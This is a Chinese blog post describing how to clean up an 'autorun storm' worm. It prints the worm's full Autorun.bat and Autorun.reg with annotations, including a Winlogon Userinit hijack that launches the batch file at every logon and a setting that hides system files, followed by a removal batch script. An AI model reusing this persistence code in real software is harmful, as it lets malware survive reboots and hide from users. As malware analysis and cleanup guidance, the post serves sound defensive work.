zoukankan      html  css  js  c++  java
  • autorun.vbs病毒的清除办法

    症状:计算机里面出现一堆autorun为文件名称的文件,删除后出现找不到autorun.vbs的提示。我就打开当中的一个文件:Autorun.bat,内容例如以下:

    @echo off  //不显示系统提示符
    rem autorun风暴   //病毒名称:autorun风暴
    if exist ./autorun.reg regedit /s ./autorun.reg  //假设存在该文件夹下的autoun.reg注冊表文件写入注冊表
    if not "%1"=="" goto open   //注冊表文件导入成功,进入open标记处。
    if exist autorun.vbs start WScript.exe autorun.vbs&exit  //假设存在autorun.vbs,则使用WScript.exe将VBS文件执行,然后退出。
    if exist %SYSTEMROOT%/system32/autorun.vbs start WScript.exe %SYSTEMROOT%/system32/autorun.vbs&exit  //假设系统文件夹下的system32内有autorun.vbs,那么用WScript.exe执行VBS,然后退出。
    exit  //退出
    :open  //标记为open
    if not "%1"=="Open" goto next  //假设open成功,进入next标记
    start explorer ./   //開始当前文件夹
    exit  // 退出
    :next  //标记为netx
    if not "%1"=="Over" goto :next2  //假设标记不成功,进入next2标记
    if exist ./autorun.bin type ./autorun.bin >C:/autorun.txt&&exit   //假设当前文件夹存在Autorun.bin,将autorun.bin写入到C盘的autorun.txt文件,然后退出。
    if exist %SYSTEMROOT%/system32/autorun.bin type %SYSTEMROOT%/system32/autorun.bin >c:/autorun.txt&&exit  //假设系统文件夹system32下存在Autorun.bin,将autorun.bin写入到C盘的autorun.txt文件,然后退出。
    exit   //退出
    :next2     //标记为next2
    if "%1"=="-" attrib -s -a -h -r %2/autorun.*    //先标记全部autorun开头的文件为非系统、非仅仅读、非隐藏、非..文件
    if "%1"=="+" attrib +s +a +h +r %2/autorun.*  //先标记全部autorun开头的文件为系统、仅仅读、隐藏、..文件
    :end   //结束

    文件二:Autorun.reg

    Windows Registry Editor Version 5.00  //Windows 注冊表编辑器 5.00创建
    autorun风暴   //autorun风暴
    [HKEY_LOCAL_MACHINE/SOFTWARE/Microsoft/Windows NT/CurrentVersion/Winlogon]
    "Userinit"="userinit.exe,autorun.bat"   //在该条目下的userinit上加入一个autorun.bat运行文件。

    [HKEY_CURRENT_USER/Software/Microsoft/Windows/CurrentVersion/Explorer/Advanced]
    "ShowSuperHidden"=dword:00000000     //不显示隐藏文件。

    我倒,这个病毒还真有点搞笑,连杀毒说明书都写好了,只是,作者显然是个好学生,老师教的要写好凝视真的没错啊!

    杀毒方法:

    能够制作一个批处理文件来进行,内容例如以下:
    @echo on
    taskkill /im explorer.exe /f
    taskkill /im wscript.exe
    start reg add HKCU/SOFTWARE/Microsoft/Windows/CurrentVersion/EXplorer/Advanced /v ShowSuperHidden /t REG_DWORD /d 1 /f
    start reg import kill.reg
    del c:/autorun.* /f /q /as
    del %SYSTEMROOT%/system32/autorun.* /f /q /as
    del d:/autorun.* /f /q /as
    del e:/autorun.* /f /q /as
    del f:/autorun.* /f /q /as
    你的盘符多就多写几个
    start explorer.exe

    运行它即可了。

  • 相关阅读:
    智慧养老民政监管平台建设方案
    CF600E Lomsat gelral dsu on tree
    dsu on tree详解
    【Spring 从0开始】Spring5 新功能,整合日志框架 Log4j2
    【Spring 从0开始】JdbcTemplate 数据库事务管理
    【Spring 从0开始】JdbcTemplate 数据库事务参数
    【Spring 从0开始】JdbcTemplate 数据库事务管理
    【Spring 从0开始】JdbcTemplate 操作数据库
    【Spring 从0开始】AOP 操作
    【Spring 从0开始】AOP 操作中的相关术语、环境准备
  • 原文地址:https://www.cnblogs.com/mfrbuaa/p/4492216.html
Copyright © 2011-2022 走看看